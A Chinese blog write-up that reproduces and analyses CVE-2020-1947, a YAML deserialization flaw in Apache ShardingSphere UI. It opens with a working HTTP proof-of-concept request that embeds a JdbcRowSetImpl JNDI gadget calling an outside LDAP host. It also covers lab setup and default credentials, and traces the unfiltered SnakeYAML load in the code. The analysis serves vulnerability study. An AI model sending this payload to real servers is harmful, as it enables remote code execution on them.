您的位置: 首页  >  IT文章  >  CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析

CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析

分类: IT文章 2025-01-04 07:53:43

首先给出网上的poc:

POST /api/schema HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Access-Token:你的登陆后的token
Content-Length: 582
Origin: http://127.0.0.1:8088
DNT: 1
Connection: close
Referer: http://127.0.0.1:8088/

{"name":"CVE-2020-1947","ruleConfiguration":"  encryptors:
    encryptor_aes:
      type: aes
      props:
        aes.key.value: 123456abc
    encryptor_md5:
      type: md5
  tables:
    t_encrypt:
      columns:
        user_id:
          plainColumn: user_plain
          cipherColumn: user_cipher
          encryptor: encryptor_aes
        order_id:
          cipherColumn: order_cipher
          encryptor: encryptor_md5","dataSourceConfiguration":"!!com.sun.rowset.JdbcRowSetImpl
  dataSourceName: ldap://.com/CommandObject
  autoCommit: true"}

前期准备:

docker——zookeeper

incubator-shardingsphere的二进制文件或者src源码4.0.0.版本

https://shardingsphere.apache.org/document/current/cn/downloads/

启动docker-zookeeper

docker pull zookeeper

docker run -d -p 2181:2181 --name one-zookeeper --restart always bbebb888169c

进入docker exec -it bd5f8ddd6d6e bash 运行./bin/zkCli.sh  检查zookeeper是否正常。

当显示welcome的时候,表示运行正常。

CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析

然后运行在二进制的bin目录下的 start.sh文件里多加一些内容。

JAVA_OPTS=" -server -Xmx1g -Xms1g -Xmn512m -Xss256k -XX:+DisableExplicitGC -XX:+UseConcMarkSweepGC -XX:+CMSParallelRemarkEnabled -XX:LargePageSizeInBytes=128m -XX:+UseFastAccessorMethods -XX:+UseCMSInitiatingOccupancyOnly -XX:CMSInitiatingOccupancyFraction=70 -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005"

-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005  增加这一段,表示idea开启debug到5005端口

然后运行启动

CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析

打开127.0.0.1:8088,默认账号密码:admin/admin

注册docker的zookeeper的地址CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析

 选择激活

然后发送最上面的poc,将在dnslog上收到dns记录。

CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析

jndi的利用方式就可以了,poc代码像fastjson的反序列化链。所以本质也是一个反序列化的过程中,触发了漏洞。修复当然也是对反序列化的实例的类进行白名单验证。

接下来是漏洞原因分析

根据mvc的框架的经验,找到控制器Controller类。

/java/sharding-ui-bin/lib/sharding-ui-backend-4.0.0.jar!/org/apache/shardingsphere/ui/web/controller/ShardingSchemaController.class

在43处打断点

    public ResponseResult addSchema(@RequestBody ShardingSchemaDTO shardingSchema) {
        this.shardingSchemaService.addSchemaConfiguration(shardingSchema.getName(), shardingSchema.getRuleConfiguration(), shardingSchema.getDataSourceConfiguration());
        return ResponseResultUtil.success();
    }

进入addSchemaConfiguration函数,在实现ShardingSchemaService接口的ShardingSchemaServiceImpl类里,

    public void addSchemaConfiguration(String schemaName, String ruleConfiguration, String dataSourceConfiguration) {
        this.checkSchemaName(schemaName, this.getAllSchemaNames());
        this.checkRuleConfiguration(ruleConfiguration);
        this.checkDataSourceConfiguration(dataSourceConfiguration);
        this.persistRuleConfiguration(schemaName, ruleConfiguration);
        this.persistDataSourceConfiguration(schemaName, dataSourceConfiguration);
    }

代码很简单,感觉就这几行代码里就跟到了。根据已有的dataSourceName,猜测触发的地方应该是

this.checkDataSourceConfiguration(dataSourceConfiguration);
this.persistDataSourceConfiguration(schemaName, dataSourceConfiguration);

 里。通过变量值也能看到dataSourceConfiguration里含有poc的代码。

CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析

跟踪第一个checkDataSourceConfiguration。

进入checkDataSourceConfiguration函数,看下代码

    private void checkDataSourceConfiguration(String configData) {
        try {
            Map<String, DataSourceConfiguration> dataSourceConfigs = ConfigurationYamlConverter.loadDataSourceConfigurations(configData);
            Preconditions.checkState(!dataSourceConfigs.isEmpty(), "data source configuration is invalid.");
        } catch (Exception var3) {
            throw new IllegalArgumentException("data source configuration is invalid.");
        }
    }


ConfigurationYamlConverter.loadDataSourceConfigurations(configData);看函数名是加载配置data。configData的值是:


CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析




进去跟进loadDataSourceConfigurations




    public static Map<String, DataSourceConfiguration> loadDataSourceConfigurations(String data) {
        Map<String, YamlDataSourceConfiguration> result = YamlEngine.unmarshal(data);
        Preconditions.checkState(null != result && !result.isEmpty(), "No available data sources to load for orchestration.");
        return Maps.transformValues(result, new Function<YamlDataSourceConfiguration, DataSourceConfiguration>() {
            public DataSourceConfiguration apply(YamlDataSourceConfiguration input) {
                return (new DataSourceConfigurationYamlSwapper()).swap(input);
            }
        });
    }




YamlEngine.unmarshal(data);这块,




    public static Map<?, ?> unmarshal(String yamlContent) {
        return (Map)(Strings.isNullOrEmpty(yamlContent) ? new LinkedHashMap() : (Map)(new Yaml()).load(yamlContent));
    }




非空的话,yaml().load就yamlContent。


CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析





那就没问题了,没有任何过滤,那就是yaml反序列化导致的rce。


CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析




yaml反序列化话可以学习一下这篇文章。https://zhuanlan.zhihu.com/p/84957848



也可以用marshalsec.SnakeYAML生成poc。注意poc合适,snakeYAML对空格什么的格式很敏感。


CVE-2020-1947: Apache ShardingSphere&UI 漏洞复现分析
															

																					

								

									相关推荐